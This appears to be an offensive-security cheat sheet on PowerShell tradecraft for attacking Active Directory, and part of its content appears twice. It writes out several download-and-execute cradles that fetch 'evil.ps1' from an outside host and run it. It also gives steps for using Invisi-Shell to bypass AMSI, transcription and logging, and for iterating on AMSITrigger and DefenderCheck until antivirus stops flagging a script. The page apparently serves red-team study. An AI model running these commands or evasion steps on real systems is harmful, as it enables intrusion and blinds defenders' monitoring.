PowerShell

Loading a Module

• Load a PowerShell script using dot sourcing
. C:\AD\Tools\PowerView.ps1

• A module (or a script) can be imported with:
Import-Module C:\AD\Tools\ADModulemaster\ActiveDirectory\ActiveDirectory.psd1

• All the commands in a module can be listed with:
Get-Command -Module <modulename>

Script Execution

• Download execute cradle
iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')

$ie=New-Object -ComObject
InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://192.168.230.1/evil.ps1
');sleep 5;$response=$ie.Document.body.innerHTML;$ie.quit();iex $response

PSv3 onwards - iex (iwr 'http://192.168.230.1/evil.ps1')

$h=New-Object -ComObject
Msxml2.XMLHTTP;$h.open('GET','http://192.168.230.1/evil.ps1',$false);$h.send();iex
$h.responseText

$wr = [System.NET.WebRequest]::Create("http://192.168.230.1/evil.ps1")
$r = $wr.GetResponse()
IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()

Invisi-Shell

To bypass:

System-wide transcription
AMSI
System Block Logging
CLM

Using Invisi-Shell

• With admin privileges:
RunWithPathAsAdmin.bat

• With non-admin privileges:
RunWithRegistryNonAdmin.bat

• Type exit from the new PowerShell session to complete the clean-up.

Bypassing AV Signatures for Powershell

Use tools like AMSITrigger, DefenderCheck to find out what part of the script defender is detection.

To obfuscate entire script, use Invoke-Obfuscation.

AMSI Trigger

Steps to avoid signature based detection are pretty simple:

Scan using AMSITrigger
Modify the detected code snippet
Rescan using AMSITrigger
Repeat the steps 2 & 3 till we get a result as “AMSI_RESULT_NOT_DETECTED” or “Blank”

Simply provide path to the script file to scan it:

AmsiTrigger_x64.exe -i C:\AD\Tools\Invoke-PowerShellTcp_Detected.ps1
DefenderCheck.exe PowerUp.ps1

PreviousTools NextAI Security

Last updated 10 months ago

• Load a PowerShell script using dot sourcing . C:\AD\Tools\PowerView.ps1 • A module (or a script) can be imported with: Import-Module C:\AD\Tools\ADModulemaster\ActiveDirectory\ActiveDirectory.psd1 • All the commands in a module can be listed with: Get-Command -Module <modulename>

Script Execution

• Download execute cradle
iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')

$ie=New-Object -ComObject
InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://192.168.230.1/evil.ps1
');sleep 5;$response=$ie.Document.body.innerHTML;$ie.quit();iex $response

PSv3 onwards - iex (iwr 'http://192.168.230.1/evil.ps1')

$h=New-Object -ComObject
Msxml2.XMLHTTP;$h.open('GET','http://192.168.230.1/evil.ps1',$false);$h.send();iex
$h.responseText

$wr = [System.NET.WebRequest]::Create("http://192.168.230.1/evil.ps1")
$r = $wr.GetResponse()
IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()

Using Invisi-Shell • With admin privileges: RunWithPathAsAdmin.bat • With non-admin privileges: RunWithRegistryNonAdmin.bat • Type exit from the new PowerShell session to complete the clean-up.

Bypassing AV Signatures for Powershell

Use tools like AMSITrigger, DefenderCheck to find out what part of the script defender is detection.

To obfuscate entire script, use Invoke-Obfuscation.

AMSI Trigger

Steps to avoid signature based detection are pretty simple:

Scan using AMSITrigger

Modify the detected code snippet

Rescan using AMSITrigger

Repeat the steps 2 & 3 till we get a result as “AMSI_RESULT_NOT_DETECTED” or “Blank”

Simply provide path to the script file to scan it:

AmsiTrigger_x64.exe -i C:\AD\Tools\Invoke-PowerShellTcp_Detected.ps1
DefenderCheck.exe PowerUp.ps1